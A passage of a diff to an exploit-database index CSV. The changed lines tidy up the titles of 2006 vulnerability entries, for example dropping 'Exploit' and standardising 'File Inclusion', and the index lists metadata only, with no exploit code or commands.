-2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 -2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure Exploit",2006-10-25,rgod,php,webapps,0 +2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0 +2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2647,platforms/php/webapps/2647.php,"Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion",2006-10-25,Kacper,php,webapps,0 @@ -2348,7 +2348,7 @@ id,file,description,date,author,platform,type,port 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion",2006-10-26,Kacper,php,webapps,0 -2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Include",2006-10-26,"Mehmet Ince",php,webapps,0 +2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0 @@ -2359,17 +2359,17 @@ id,file,description,date,author,platform,type,port 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - (viewticket.php) Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 -2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - File Include",2006-10-28,"Mehmet Ince",php,webapps,0 +2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion",2006-10-28,ajann,php,webapps,0 -2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 -2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 +2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 +2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components - 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 -2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Include",2006-10-29,"Mehmet Ince",php,webapps,0 +2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Inclusion",2006-10-29,"Mehmet Ince",php,webapps,0 2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,php,webapps,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 -2677,platforms/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 +2677,platforms/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows/x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 @@ -2378,8 +2378,8 @@ id,file,description,date,author,platform,type,port 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0 -2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Include Exploit",2006-10-30,Kacper,php,webapps,0 -2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass SQL Injection",2006-10-30,ajann,php,webapps,0 +2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0 +2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 @@ -2412,7 +2412,7 @@ id,file,description,date,author,platform,type,port 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0 -2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 +2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion",2006-11-06,the_day,php,webapps,0 @@ -2422,13 +2422,13 @@ id,file,description,date,author,platform,type,port 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - (nfsd.exe) Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 -2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Include",2006-11-06,ajann,php,webapps,0 +2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion",2006-11-06,ajann,php,webapps,0 2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Inclusion",2006-11-07,HER0,php,webapps,0 -2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OS X) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OS X) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 @@ -2458,7 +2458,7 @@ id,file,description,date,author,platform,type,port 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 -2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Include / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 +2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 @@ -2466,10 +2466,10 @@ id,file,description,date,author,platform,type,port 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0 -2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 +2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 -2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass SQL Injection",2006-11-14,ajann,asp,webapps,0 +2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 @@ -2478,7 +2478,7 @@ id,file,description,date,author,platform,type,port 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 -2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OS X) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 +2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 @@ -2487,7 +2487,7 @@ id,file,description,date,author,platform,type,port 2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 -2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Include",2006-11-17,bd0rk,php,webapps,0 +2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Inclusion",2006-11-17,bd0rk,php,webapps,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 @@ -2538,14 +2538,14 @@ id,file,description,date,author,platform,type,port 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 -2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 +2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,php,webapps,0 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - (Playlist) Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 -2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 +2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 @@ -2559,12 +2559,12 @@ id,file,description,date,author,platform,type,port 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 -2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 +2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Inclusion",2006-12-03,GregStar,php,webapps,0 -2887,platforms/windows/remote/2887.pl,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 +2887,platforms/windows/remote/2887.pl,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 @@ -2573,14 +2573,14 @@ id,file,description,date,author,platform,type,port 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 -2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Include",2006-12-08,3l3ctric-Cracker,php,webapps,0 +2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 -2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection",2006-12-08,koray,php,webapps,0 +2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection)",2006-12-08,koray,php,webapps,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 -2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 -2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 +2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure",2006-12-09,r0ut3r,php,webapps,0 +2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution",2006-12-09,r0ut3r,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 2905,platforms/php/webapps/2905.txt,"Gizzar 03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0 @@ -2613,7 +2613,7 @@ id,file,description,date,author,platform,type,port 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 2937,platforms/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution",2006-12-16,Kacper,php,webapps,0 -2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 +2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 @@ -2624,9 +2624,9 @@ id,file,description,date,author,platform,type,port 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0 2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - (main.inc.php) Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 -2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 +2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 -2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution Exploit",2006-12-19,"Marco Ivaldi",multiple,remote,0 +2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 @@ -2643,7 +2643,7 @@ id,file,description,date,author,platform,type,port 2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - (config/sender.php) Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0 2967,platforms/windows/dos/2967.cs,"Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 -2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 +2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 @@ -2689,7 +2689,7 @@ id,file,description,date,author,platform,type,port 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3013,platforms/windows/dos/3013.py,"Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service",2006-12-25,h07,windows,dos,0 -3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution",2006-12-25,CorryL,php,webapps,0 +3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"PHP-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 @@ -2699,7 +2699,7 @@ id,file,description,date,author,platform,type,port 3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 -3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 